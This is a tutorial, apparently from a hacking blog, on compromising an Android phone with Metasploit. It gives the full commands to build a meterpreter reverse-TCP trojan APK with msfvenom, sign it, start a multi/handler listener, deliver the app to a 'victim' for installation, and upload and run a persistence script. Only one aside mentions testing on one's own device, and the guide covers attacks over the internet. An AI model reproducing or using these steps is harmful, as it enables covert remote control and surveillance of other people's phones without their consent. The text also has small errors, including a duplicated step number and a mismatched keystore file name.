Hack Android Using Metasploit

1. Open a terminal.

2. You can do this by typing:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Port to Listen>

R > /root/Desktop/<anything>.apk (replace LHOST with your own IP)

Note: You can also hack android on WAN i.e. through Internet by using your Public/ExternalP in the LHOST and by port forwarding

  

.

3. Now we must generate a keystore and sign our apk because if we dont on some devices or some versions of android signature of app is required.

4. For Generating the Keystore:

keytool -genkey -v -keystore /root/Desktop/my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

5. Enter a Six Digit Password and keep it remember.

6. Fill all the details and say Yes at last question asked. Keystore will be created. You will be again asked for the password.

7. Now we have to sign the apk file using this Keystore. To do this type:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore2 my_application.apk alias_name

When it ask for the Passphrase, Enter the password you entered earlier.

8. Load metasploit console, by typing:

msfconsole

9. After it loads (it will take time), load the multi-handler exploit by typing : 

use exploit/multi/handler

10. Set up a (reverse) payload by typing: 

set payload android/meterpreter/reverse_tcp

11. To set L host type : 

set LHOST <Your IP>

Note: Even if you are hacking on WAN type your private/internal IP here not 
the public/external

12. At last type: exploit to start the listener.

13. Copy the application that you made (Anything.apk) from the root folder, 
to your android phone.

14. Then send the apk file to the phone you want to hack.

15. Let the Victim install the app.

Note: However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.

16. And when he clicks Open, there comes the meterpreter prompt.

17. Download Persistent.sh

18. Upload the file to the device in /sdcard/Downloads.

19. cd /  (To go to the Root Directory)

19. Then navigate to the /sdcard/Download/ using cd

20. To upload the file use command:

upload /root/Desktop/Persistent.sh

(For these Images anything.sh is actually Persistent.sh)

21. Now, all we must do is execute the script once, and then everything will be done by the script automatically.

22. Drop into the system's shell by typing:

shell

23. Now, navigate to the location of the script:

cd /

cd /sdcard/Download

ls

24. Now its time for EXECUTION. Type:

sh Persistent.sh

Things To Remember:

The persistence of the backdoor will only remain until a reboot of the android system.

If you are hacking on WAN and you have a dynamic Public IP, then, the persistence will only remain until your router reboots/your IP changes.

Remember to reboot the android to eliminate the running script, if you are testing on you own Android System.

If the Victim's Android system is Rooted and your Public IP is Static, then:

1)The Persistence will remain forever on WAN!

2)The Persistence will remain forever on LAN Obviously.

Video Tutorial: